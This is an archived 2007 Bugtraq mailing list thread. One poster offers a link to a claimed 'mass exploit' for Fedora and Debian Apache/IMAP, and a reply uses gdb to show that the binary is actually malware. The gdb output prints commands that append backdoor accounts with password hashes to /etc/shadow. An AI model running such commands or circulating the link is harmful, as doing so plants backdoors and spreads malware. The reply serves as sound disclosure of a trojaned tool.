lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 28 Aug 2007 22:54:44 +0000 (UTC)
From: jf <jf@...glingpointers.net>
To: linux0day@...oo.co.uk
Cc: bugtraq@...urityfocus.com
Subject: Re: Found nice mass exploits for fedora and imap

heh, dude seriously, at least learn to strip -s your bin's.

FYI this is malware, it does things like:

(gdb) x/s 0x80494e0
0x80494e0 <__dso_handle+816>:    "echo
toor:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>:    "echo
newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"

Interestingly enough, the only newb here is you.

On Tue, 28 Aug 2007, linux0day@...oo.co.uk wrote:

> Date: 28 Aug 2007 01:33:20 -0000
> From: linux0day@...oo.co.uk
> To: bugtraq@...urityfocus.com
> Subject: Found nice mass exploits for fedora and imap
>
> Hello bugtraq,
> Did somebody realize a new mass exploits is realeased to public, it's seems work for fedora core 5, 6 and debian 3.1 with exploiting apache and imap.
>
> I've found this link somedays ago in a security forum, check this out
>
> http://rufy.com/images/mass/
>

Powered by blists - more mailing lists